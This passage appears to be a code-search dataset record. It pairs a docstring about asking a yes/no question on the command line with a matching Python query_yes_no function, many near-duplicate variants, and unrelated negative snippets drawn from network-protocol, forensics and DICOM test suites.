100, timeout,\n table_id, match, instructions)\n datapath.send_msg(flow_mod)\n\n print \"sent flow_mod\"", "def run_example(host, port):\r\n print \"host is %s:%d\"%(host,port)\r\n setup_db(\"sqlite:///torflow.sqlite\", echo=False)\r\n\r\n #l_session = tc_session()\r\n #print l_session.query(((func.count(Extension.id)))).filter(and_(FailedExtension.table.c.row_type=='extension', FailedExtension.table.c.from_node_idhex == \"7CAA2F5F998053EF5D2E622563DEB4A6175E49AC\")).one()\r\n #return\r\n #for e in Extension.query.filter(FailedExtension.table.c.row_type=='extension').all():\r\n # if e.from_node: print \"From: \"+e.from_node.idhex+\" \"+e.from_node.nickname\r\n # if e.to_node: print \"To: \"+e.to_node.idhex+\" \"+e.to_node.nickname\r\n #tc_session.remove()\r\n #return\r\n\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n c = Connection(s)\r\n th = c.launch_thread()\r\n c.authenticate(control_pass)\r\n c.set_event_handler(TorCtl.ConsensusTracker(c))\r\n c.add_event_listener(ConsensusTrackerListener())\r\n c.add_event_listener(CircuitListener())\r\n\r\n print `c.extend_circuit(0,[\"moria1\"])`\r\n try:\r\n print `c.extend_circuit(0,[\"\"])`\r\n except TorCtl.ErrorReply: # wtf?\r\n print \"got error. 
good.\"\r\n except:\r\n print \"Strange error\", sys.exc_info()[0]\r\n \r\n c.set_events([EVENT_TYPE.STREAM, EVENT_TYPE.CIRC,\r\n EVENT_TYPE.NEWCONSENSUS, EVENT_TYPE.NEWDESC,\r\n EVENT_TYPE.ORCONN, EVENT_TYPE.BW], True)\r\n\r\n th.join()\r\n return", "def test_transform_simple(self):\n transformer = SnmpTransformer()\n transformer.setup(\"test\",{\n \"mib_dir\" : \"/dev/null\"\n })\n transformer.registered_mibs += (transformer.parse_file({\n \"EVENT test_event .1.3.6.1.4.1.2021.13.990.0.17 \\\"test category\\\" severity\" : 0,\n \"FORMAT $*\" : 1\n }))\n str = 'HOST:testhost.localdomain;IP:UDP: [127.0.5.1]:50935;VARS:.1.3.6.1.2.1.1.3.0 = 2:22:16:27.46 ; .1.3.6.1.6.3.1.1.4.1.0 = .1.3.6.1.4.1.2021.13.990.0.17 ; .1.3.6.1.2.1.1.6.0 = Argument 1 ; .1.3.6.1.6.3.18.1.3.0 = 127.0.0.1 ; .1.3.6.1.6.3.18.1.4.0 = \"public\" ; .1.3.6.1.6.3.1.1.4.3.0 = .1.3.6.1.4.1.2021.13.990'\n event = transformer.transform(str)\n assert event[\"trap_oid\"] == \".1.3.6.1.4.1.2021.13.990.0.17\"\n assert event[\"host_address\"] == \"127.0.5.1\"\n assert event[\"host_name\"] == \"testhost.localdomain\"\n assert event[\"message\"] == \"Argument 1\"", "def test_data_framing(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"x\" * 100\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n for byte in request_body[:-1]:\n deproxy_cl.make_request(request=byte, end_stream=False)\n deproxy_cl.make_request(request=request_body[-1], end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "async def flow(self, session: ClientSession, data: Dict) -> None:", "def testInterrogate(self):\n\n flow_name = \"Interrogate\"\n\n with test_lib.Stubber(flow.GRRFlow, \"SendReply\", self.MockSendReply):\n # Run the flow in the simulated way\n for _ in test_lib.TestFlowHelper(flow_name, InterrogatedClient(),\n token=self.token,\n client_id=self.client_id):\n pass\n\n # Now check that the AFF4 object is properly set\n fd = aff4.FACTORY.Open(self.client_id, token=self.token)\n\n self.assertEqual(fd.Get(fd.Schema.HOSTNAME), \"test_node\")\n self.assertEqual(fd.Get(fd.Schema.SYSTEM), \"Linux\")\n self.assertEqual(fd.Get(fd.Schema.INSTALL_DATE), 100 * 1000000)\n\n # Check the client info\n info = fd.Get(fd.Schema.CLIENT_INFO)\n\n self.assertEqual(info.client_name, config_lib.CONFIG[\"Client.name\"])\n self.assertEqual(info.client_version,\n int(config_lib.CONFIG[\"Client.version_numeric\"]))\n self.assertEqual(info.build_time, config_lib.CONFIG[\"Client.build_time\"])\n\n # Check the client config\n config_info = fd.Get(fd.Schema.GRR_CONFIG)\n self.assertEqual(config_info.location, \"http://www.example.com\")\n self.assertEqual(config_info.poll_min, 1.0)\n\n # Check that the index has been updated.\n index_fd = aff4.FACTORY.Create(fd.Schema.client_index, \"AFF4Index\",\n mode=\"r\", token=self.token)\n\n self.assertEqual(\n [fd.urn],\n [x for x in index_fd.Query([fd.Schema.HOSTNAME], \".*test.*\")])\n\n # Check for notifications\n user_fd = aff4.FACTORY.Open(\"aff4:/users/test\", token=self.token)\n notifications = user_fd.Get(user_fd.Schema.PENDING_NOTIFICATIONS)\n\n self.assertEqual(len(notifications), 1)\n notification = notifications[0]\n\n self.assertEqual(notification.subject, rdfvalue.RDFURN(self.client_id))\n\n # Check that reply sent from the flow is correct\n self.assertEqual(self.flow_reply.client_info.client_name,\n config_lib.CONFIG[\"Client.name\"])\n 
self.assertEqual(self.flow_reply.client_info.client_version,\n int(config_lib.CONFIG[\"Client.version_numeric\"]))\n self.assertEqual(self.flow_reply.client_info.build_time,\n config_lib.CONFIG[\"Client.build_time\"])\n\n self.assertEqual(self.flow_reply.system_info.system, \"Linux\")\n self.assertEqual(self.flow_reply.system_info.node, \"test_node\")\n self.assertEqual(self.flow_reply.system_info.release, \"5\")\n self.assertEqual(self.flow_reply.system_info.version, \"2\")\n self.assertEqual(self.flow_reply.system_info.machine, \"i386\")\n\n users = list(fd.Get(fd.Schema.USER))\n self.assertEqual(len(users), 3)\n self.assertEqual(users[0].username, \"Foo\")\n self.assertEqual(users[1].username, \"Bar\")\n self.assertEqual(users[2].username, u\"文德文\")\n self.assertEqual(str(fd.Get(fd.Schema.USERNAMES)),\n \"Foo Bar 文德文\")\n\n net_fd = fd.OpenMember(\"network\")\n interfaces = list(net_fd.Get(net_fd.Schema.INTERFACES))\n self.assertEqual(interfaces[0].mac_address, \"123456\")\n self.assertEqual(interfaces[0].addresses[0].human_readable, \"127.0.0.1\")\n self.assertEqual(socket.inet_ntoa(interfaces[0].addresses[0].packed_bytes),\n \"127.0.0.1\")\n\n # Mac addresses should be available as hex for searching\n mac_addresses = fd.Get(fd.Schema.MAC_ADDRESS)\n self.assertTrue(\"123456\".encode(\"hex\") in str(mac_addresses))\n\n # Check that virtual directories exist for the mount points\n fd = aff4.FACTORY.Open(self.client_id.Add(\"fs/os/mnt/data\"),\n token=self.token)\n # But no directory listing exists yet - we will need to fetch a new one\n self.assertEqual(len(list(fd.OpenChildren())), 0)\n\n fd = aff4.FACTORY.Open(self.client_id.Add(\"fs/tsk/dev/sda\"),\n token=self.token)\n # But no directory listing exists yet - we will need to fetch a new one\n self.assertEqual(len(list(fd.OpenChildren())), 0)\n\n fd = aff4.FACTORY.Open(self.client_id.Add(\"devices/dev/sda\"),\n token=self.token)\n # But no directory listing exists yet - we will need to fetch a new one\n self.assertEqual(len(list(fd.OpenChildren())), 0)\n\n # Check flow's reply\n self.assertEqual(len(self.flow_reply.users), 3)\n self.assertEqual(self.flow_reply.users[0].username, \"Foo\")\n self.assertEqual(self.flow_reply.users[1].username, \"Bar\")\n self.assertEqual(self.flow_reply.users[2].username, u\"文德文\")\n\n self.assertEqual(len(self.flow_reply.interfaces), 1)\n self.assertEqual(self.flow_reply.interfaces[0].mac_address, \"123456\")\n\n # Check that the client summary was published to the event listener.\n self.assertEqual(DiscoveryTestEventListener.event.client_id, self.client_id)\n self.assertEqual(\n DiscoveryTestEventListener.event.interfaces[0].mac_address,\n \"123456\")\n\n # Check that label indexes are updated.\n self.assertEqual(\n list(search.SearchClients(\"label:Label2\", token=self.token)),\n [self.client_id])", "def test_examine(self):\n SimpleServer.theAccount.addMailbox('test-mailbox')\n self.examinedArgs = None\n def login():\n return self.client.login(b'testuser', b'password-test')\n def examine():\n def examined(args):\n self.examinedArgs = args\n self._cbStopClient(None)\n d = self.client.examine('test-mailbox')\n d.addCallback(examined)\n return d\n\n d1 = self.connected.addCallback(strip(login))\n d1.addCallback(strip(examine))\n d1.addErrback(self._ebGeneral)\n d2 = self.loopback()\n d = defer.gatherResults([d1, d2])\n return d.addCallback(self._cbTestExamine)", "def test_message_rx(self):\n\n self.maxDiff = 1000\n session_id = self._open_session()\n\n # Send a data message in our new session\n 
sent_data_message = {\n \"fqdn\": self.CLIENT_NAME,\n \"type\": \"DATA\",\n \"plugin\": \"test_messaging\",\n \"session_id\": session_id,\n \"session_seq\": 0,\n \"body\": None,\n }\n response = self._post([sent_data_message])\n self.assertResponseOk(response)\n\n forwarded_data_message = self._receive_one_amqp()\n\n self.assertDictEqual(sent_data_message, forwarded_data_message)", "def test_rsp_success(self):\n\n def handle(event):\n return 0x0000, event.action_information\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(ProceduralEventLogging)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_ACTION, handle)]\n )\n\n ae.add_requested_context(ProceduralEventLogging)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n ds = Dataset()\n ds.PatientName = \"Test^test\"\n status, ds = assoc.send_n_action(\n ds, 1, ProceduralEventLogging, \"1.2.840.10008.5.1.1.40.1\"\n )\n assert status.Status == 0x0000\n assert ds.PatientName == \"Test^test\"\n assoc.release()\n assert assoc.is_released\n\n scp.shutdown()", "def _handler_command_test(self, *args, **kwargs):\n next_state = None\n result = None\n\n next_state = SBE37ProtocolState.TEST\n \n return (next_state, result)", "def test_construct_with_node():\n control_data = get_control_data('node')\n payload = messages.construct_payload('This is the subject line', node={\"id\": \"my-board\"})\n assert payload == control_data\n return", "def test_message_tx(self):\n session_id = self._open_session()\n\n sent_fresh_message = {\n \"fqdn\": self.CLIENT_NAME,\n \"type\": \"DATA\",\n \"plugin\": \"test_messaging\",\n \"session_id\": session_id,\n \"session_seq\": 0,\n \"body\": None,\n }\n self._send_one_amqp(sent_fresh_message)\n\n response = self._get()\n self.assertResponseOk(response)\n forwarded_messages = response.json()[\"messages\"]\n self.assertEqual(len(forwarded_messages), 1)\n self.assertEqual(forwarded_messages[0], sent_fresh_message)", "def testParse(self):\n parser = pcap.PcapParser()\n storage_writer = self._ParseFile(['test.pcap'], parser)\n\n # PCAP information:\n # Number of streams: 96 (TCP: 47, UDP: 39, ICMP: 0, Other: 10)\n #\n # For each stream 2 events are generated one for the start\n # and one for the end time.\n\n self.assertEqual(storage_writer.number_of_events, 192)\n\n events = list(storage_writer.GetEvents())\n\n # Test stream 3 (event 6).\n # Protocol: TCP\n # Source IP: 192.168.195.130\n # Dest IP: 63.245.217.43\n # Source Port: 1038\n # Dest Port: 443\n # Stream Type: SSL\n # Starting Packet: 4\n # Ending Packet: 6\n\n event = events[6]\n self.assertEqual(event.packet_count, 3)\n self.assertEqual(event.protocol, 'TCP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '63.245.217.43')\n self.assertEqual(event.dest_port, 443)\n self.assertEqual(event.source_port, 1038)\n self.assertEqual(event.stream_type, 'SSL')\n self.assertEqual(event.first_packet_id, 4)\n self.assertEqual(event.last_packet_id, 6)\n\n # Test stream 6 (event 12).\n # Protocol: UDP\n # Source IP: 192.168.195.130\n # Dest IP: 192.168.195.2\n # Source Port: 55679\n # Dest Port: 53\n # Stream Type: DNS\n # Starting Packet: 4\n # Ending Packet: 6\n # Protocol Data: DNS Query for wpad.localdomain\n\n event = events[12]\n self.assertEqual(event.packet_count, 5)\n self.assertEqual(event.protocol, 'UDP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, 
'192.168.195.2')\n self.assertEqual(event.dest_port, 53)\n self.assertEqual(event.source_port, 55679)\n self.assertEqual(event.stream_type, 'DNS')\n self.assertEqual(event.first_packet_id, 11)\n self.assertEqual(event.last_packet_id, 1307)\n self.assertEqual(\n event.protocol_data, 'DNS Query for wpad.localdomain')\n\n expected_message = (\n 'Source IP: 192.168.195.130 '\n 'Destination IP: 192.168.195.2 '\n 'Source Port: 55679 '\n 'Destination Port: 53 '\n 'Protocol: UDP '\n 'Type: DNS '\n 'Size: 380 '\n 'Protocol Data: DNS Query for wpad.localdomain '\n 'Stream Data: \\'\\\\xb8\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00'\n '\\\\x00\\\\x00\\\\x04wpad\\\\x0blocaldomain\\\\x00\\\\x00\\\\x01\\\\x00\\\\x01\\\\xb8'\n '\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x04wpa\\' '\n 'First Packet ID: 11 '\n 'Last Packet ID: 1307 '\n 'Packet Count: 5')\n expected_short_message = (\n 'Type: DNS '\n 'First Packet ID: 11')\n\n self._TestGetMessageStrings(event, expected_message, expected_short_message)", "def test_run_and_logs(self, registered_model):\n create_standard_model = functools.partial(\n registered_model.create_standard_model,\n code_dependencies=[],\n environment=Python([]),\n )\n echo_model_ver = create_standard_model(Echo)\n double_model_ver = create_standard_model(Double)\n triple_model_ver = create_standard_model(Triple)\n sum_model_ver = create_standard_model(Sum)\n\n pipeline_defn = {\n \"steps\": [\n {\"name\": \"echo\", \"model_version_id\": echo_model_ver.id},\n {\"name\": \"double\", \"model_version_id\": double_model_ver.id},\n {\"name\": \"triple\", \"model_version_id\": triple_model_ver.id},\n {\"name\": \"sum\", \"model_version_id\": sum_model_ver.id},\n ],\n \"graph\": [\n {\"name\": \"double\", \"predecessors\": [\"echo\"]},\n {\"name\": \"triple\", \"predecessors\": [\"echo\"]},\n {\"name\": \"sum\", \"predecessors\": [\"double\", \"triple\"]},\n ],\n }\n orchestrator = LocalOrchestrator(registered_model._conn, pipeline_defn)\n\n input = 3\n with runtime.context() as ctx:\n output = orchestrator.run(3)\n assert ctx.logs() == {\n \"echo\": f\"echoing {input}\",\n \"double\": f\"doubling {input}\",\n \"triple\": f\"tripling {input}\",\n \"sum\": f\"summing {input * 2} and {input * 3}\",\n }\n assert output == input * 2 + input * 3\n assert orchestrator._outputs == {\n \"echo\": input,\n \"double\": input * 2,\n \"triple\": input * 3,\n \"sum\": output,\n }", "def run():\n args = parse_args()\n auth_string = get_auth_string(args.auth)\n case_id = new_case_id()\n\n # Read patient's age and sex; required by /diagnosis endpoint.\n # Alternatively, this could be done after learning patient's complaints\n age, sex = conversation.read_age_sex()\n print(f\"Ok, {age} year old {sex}.\")\n age = {'value': age, 'unit': 'year'}\n\n # Query for all observation names and store them. In a real chatbot, this\n # could be done once at initialisation and used for handling all events by\n # one worker. 
This is an id2name mapping.\n naming = apiaccess.get_observation_names(age, auth_string, case_id, args.model)\n\n # Read patient's complaints by using /parse endpoint.\n mentions = conversation.read_complaints(age, sex, auth_string, case_id, args.model)\n\n # Keep asking diagnostic questions until stop condition is met (all of this\n # by calling /diagnosis endpoint) and get the diagnostic ranking and triage\n # (the latter from /triage endpoint).\n evidence = apiaccess.mentions_to_evidence(mentions)\n evidence, diagnoses, triage = conversation.conduct_interview(evidence, age,\n sex, case_id,\n auth_string,\n args.model)\n\n # Add `name` field to each piece of evidence to get a human-readable\n # summary.\n apiaccess.name_evidence(evidence, naming)\n\n # Print out all that we've learnt about the case and finish.\n print()\n conversation.summarise_all_evidence(evidence)\n conversation.summarise_diagnoses(diagnoses)\n '''conversation.summarise_triage(triage)'''", "def test_decode_failure(self):\n\n def handle(event):\n ds = Dataset()\n ds.PatientName = \"Test^test\"\n return 0x0000, ds\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(DisplaySystem)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_GET, handle)]\n )\n\n ae.add_requested_context(DisplaySystem)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n class DummyReply:\n def getvalue(self):\n def test():\n pass\n\n return test\n\n class DummyMessage:\n is_valid_response = True\n AttributeList = DummyReply()\n Status = 0x0000\n STATUS_OPTIONAL_KEYWORDS = []\n\n class DummyDIMSE:\n msg_queue = queue.Queue()\n gotten = False\n\n def send_msg(*args, **kwargs):\n return\n\n def get_msg(self, *args, **kwargs):\n if not self.gotten:\n self.gotten = True\n return 1, DummyMessage()\n return None, None\n\n assoc._reactor_checkpoint.clear()\n while not assoc._is_paused:\n time.sleep(0.01)\n assoc.dimse = DummyDIMSE()\n assert assoc.is_established\n status, ds = assoc.send_n_get(\n [(0x7FE0, 0x0010)], DisplaySystem, \"1.2.840.10008.5.1.1.40.1\"\n )\n\n assert status.Status == 0x0110\n assert ds is None\n\n scp.shutdown()", "def _handler_test_run_tests(self, *args, **kwargs):\n next_state = None\n result = None\n\n tc_pass = False\n tt_pass = False\n tp_pass = False\n tc_result = None\n tt_result = None\n tp_result = None\n\n test_result = {}\n\n try:\n tc_pass, tc_result = self._do_cmd_resp('tc', timeout=200)\n tt_pass, tt_result = self._do_cmd_resp('tt', timeout=200)\n tp_pass, tp_result = self._do_cmd_resp('tp', timeout=200)\n \n except Exception as e:\n test_result['exception'] = e\n test_result['message'] = 'Error running instrument tests.'\n \n finally:\n test_result['cond_test'] = 'Passed' if tc_pass else 'Failed'\n test_result['cond_data'] = tc_result\n test_result['temp_test'] = 'Passed' if tt_pass else 'Failed'\n test_result['temp_data'] = tt_result\n test_result['pres_test'] = 'Passed' if tp_pass else 'Failed'\n test_result['pres_data'] = tp_result\n test_result['success'] = 'Passed' if (tc_pass and tt_pass and tp_pass) else 'Failed'\n \n self._driver_event(DriverAsyncEvent.TEST_RESULT, test_result)\n next_state = SBE37ProtocolState.COMMAND\n \n return (next_state, result)", "def test_sendTableWithName(self):\n client = AMP()\n\n class SampleCommand(Command):\n arguments = [(\"id\", Integer())]\n\n class Receiver(AMP):\n @SampleCommand.responder\n def gotIt(self, id):\n self.it = id\n return {}\n\n 
server = Receiver()\n clientT = StringTransport()\n serverT = StringTransport()\n client.makeConnection(clientT)\n server.makeConnection(serverT)\n client.callRemote(SampleCommand, id=123)\n server.dataReceived(clientT.io.getvalue())\n self.assertEqual(server.it, 123)", "def test_fast_forward_scenario1 (self) :\n\t\tnodeList = self.createNodes(3)\n\n\t\t# Adding a record to a node A\n\t\tnodeList[0].addAppData(\"record1\",\"A version 1\", Node.ALL, Node.ALL)\n\t\tnodeList[0].serialize((Node.ALL, Node.ALL))\n\t\t\n\t\t# Node A pushing data to Node B\n\t\tsess0_1 = nodeList[0].createSyncSession(nodeList[1], nodeList[1].instanceID)\n\t\tnodeList[0].pushInitiation(sess0_1, (Node.ALL, Node.ALL))\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByInstance, nodeList[0].instanceID)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByCounter, 1)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByHistory, {nodeList[0].instanceID:1})\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].partitionFacility, Node.ALL)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].partitionUser, Node.ALL)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].recordData, \"A version 1\")\n\n\t\tappRecord = nodeList[1].searchRecordInApp(\"record1\")\t\n\t\tself.assertEqual(appRecord.recordData, \"A version 1\")\n\t\tself.assertEqual(appRecord.dirtyBit, 0)\n\t\tself.assertEqual(appRecord.partitionFacility, Node.ALL)\n\t\tself.assertEqual(appRecord.partitionUser, Node.ALL)\n\n\t\t# Node B now modifies this data\n\t\tnodeList[1].addAppData(\"record1\",\"B version 1\", Node.ALL, Node.ALL)\n\t\tself.assertEqual(appRecord.recordData, \"B version 1\")\n\t\tself.assertEqual(appRecord.dirtyBit, 1)\n\n\t\tnodeList[1].serialize((Node.ALL, Node.ALL))\n\t\tself.assertEqual(appRecord.dirtyBit, 0)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByInstance, nodeList[1].instanceID)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByCounter, 1)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByHistory, {nodeList[0].instanceID:1,\\\n\t\t\t nodeList[1].instanceID:1})\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].partitionFacility, Node.ALL)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].partitionUser, Node.ALL)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].recordData, \"B version 1\")\n\n\t\t# Node B pushing data to Node C\n\t\tsess1_2 = nodeList[1].createSyncSession(nodeList[2], nodeList[2].instanceID)\n\t\tnodeList[1].pushInitiation(sess1_2, (Node.ALL, Node.ALL))\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByInstance, nodeList[1].instanceID)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByCounter, 1)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByHistory, {nodeList[0].instanceID:1, \\\n\t\t\tnodeList[1].instanceID:1})\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].partitionFacility, Node.ALL)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].partitionUser, Node.ALL)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].recordData, \"B version 1\")\n\n\t\t# Node A pushing data to Node C\n\t\tsess0_2 = nodeList[0].createSyncSession(nodeList[2], nodeList[2].instanceID)\n\t\tnodeList[0].pushInitiation(sess0_2, (Node.ALL, Node.ALL))\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByInstance, nodeList[1].instanceID)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByCounter, 1)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByHistory, 
{nodeList[0].instanceID:1, \\\n\t\t\tnodeList[1].instanceID:1})\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].partitionFacility, Node.ALL)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].partitionUser, Node.ALL)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].recordData, \"B version 1\")", "def test_rsp_bad_dataset(self):\n\n def handle(event):\n return 0x0000, event.action_information\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(PrintJob)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_ACTION, handle)]\n )\n\n ae.add_requested_context(PrintJob)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n class DummyReply:\n def getvalue(self):\n def test():\n pass\n\n return test\n\n class DummyMessage:\n is_valid_response = True\n is_valid_request = False\n msg_type = None\n ActionReply = DummyReply()\n Status = 0x0000\n STATUS_OPTIONAL_KEYWORDS = []\n\n class DummyDIMSE:\n msg_queue = queue.Queue()\n\n def send_msg(*args, **kwargs):\n return\n\n def get_msg(*args, **kwargs):\n rsp = DummyMessage()\n return 1, rsp\n\n assoc._reactor_checkpoint.clear()\n while not assoc._is_paused:\n time.sleep(0.01)\n assoc.dimse = DummyDIMSE()\n ds = Dataset()\n ds.PatientName = \"Test^test\"\n status, ds = assoc.send_n_action(ds, 1, PrintJob, \"1.2.840.10008.5.1.1.40.1\")\n\n assert status.Status == 0x0110\n assert ds is None\n\n scp.shutdown()" ]
[ "0.5372232", "0.5337886", "0.5229061", "0.51248443", "0.5084246", "0.5082173", "0.5059913", "0.50520146", "0.5048308", "0.50415814", "0.5012191", "0.5003331", "0.49835372", "0.49795404", "0.49769887", "0.49708155", "0.49585548", "0.49475357", "0.49267948", "0.48812303", "0.48809856", "0.48587957", "0.48386958", "0.48309466", "0.4823552", "0.47841203", "0.4783123", "0.4774407", "0.47600457", "0.475357" ]
0.5756279
0
Ask a yes/no question via raw_input() and return their answer. "question" is a string that is presented to the user. "default" is the presumed answer if the user just hits <Enter>. It must be "yes" (the default), "no", or None (meaning an answer is required of the user). The "force" option simply sets the answer to the default. The "answer" return value is True for "yes" or False for "no".
import sys

def query_yes_no(question, default="yes", force=False):
    valid = {"yes": True, "y": True, "ye": True,
             "no": False, "n": False}
    if default is None:
        prompt = " [y/n] "
    elif default == "yes":
        prompt = " [Y/n] "
    elif default == "no":
        prompt = " [y/N] "
    else:
        raise ValueError("invalid default answer: '%s'" % default)

    while True:
        sys.stdout.write(question + prompt)
        if force:
            # "force" skips the prompt and answers with the default
            # (falling back to "yes" when no default is set).
            choice = default if default is not None else "yes"
        else:
            choice = raw_input().lower()
        if default is not None and choice == '':
            return valid[default]
        elif choice in valid:
            return valid[choice]
        else:
            sys.stdout.write("Please respond with 'yes' or 'no' "
                             "(or 'y' or 'n').\n")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":\"yes\", \"y\":\"yes\", \"ye\":\"yes\",\n \"no\":\"no\", \"n\":\"no\"}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n while 1:\n sys.stdout.write(question + prompt)\n if sys.version_info[0]==2:\n choice = raw_input().lower()\n elif sys.version_info[0]>2:\n choice = input().lower()\n if default is not None and choice == '':\n return default\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":\"yes\", \"y\":\"yes\", \"ye\":\"yes\",\n \"no\":\"no\", \"n\":\"no\"}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while 1:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return default\n elif choice in valid.keys():\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"no\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(self,question, default=\"yes\"):\n valid = {\"yes\":\"yes\", \"y\":\"yes\", \"ye\":\"yes\", \"no\":\"no\", \"n\":\"no\"}\n\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while 1:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return default\n elif choice in valid.keys():\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' (or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\r\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\r\n \"no\": False, \"n\": False}\r\n if default is None:\r\n prompt = \" [y/n] \"\r\n elif default == \"yes\":\r\n prompt = \" [Y/n] \"\r\n elif default == \"no\":\r\n prompt = \" [y/N] \"\r\n else:\r\n raise ValueError(\"invalid default answer: '%s'\" % default)\r\n\r\n while True:\r\n sys.stdout.write(question + prompt)\r\n choice = raw_input().lower()\r\n if default is not None and choice == '':\r\n return valid[default]\r\n elif choice in valid:\r\n return valid[choice]\r\n else:\r\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\r\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\r\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\r\n \"no\": False, \"n\": False}\r\n\r\n if default is None:\r\n prompt = \" [y/n] \"\r\n elif default == \"yes\":\r\n prompt = 
\" [Y/n] \"\r\n elif default == \"no\":\r\n prompt = \" [y/N] \"\r\n else:\r\n raise ValueError(\"invalid default answer: '%s'\" % default)\r\n\r\n while True:\r\n sys.stdout.write(question + prompt)\r\n choice = raw_input().lower()\r\n if default is not None and choice == '':\r\n return valid[default]\r\n elif choice in valid:\r\n return valid[choice]\r\n else:\r\n sys.stdout.write(\"Please respond with 'yes' or 'no' (or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError( _(\"invalid default answer:\") + \" '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write( _(\"Please respond with 'yes' or 'no' \") + \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\r\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\r\n \"no\":False, 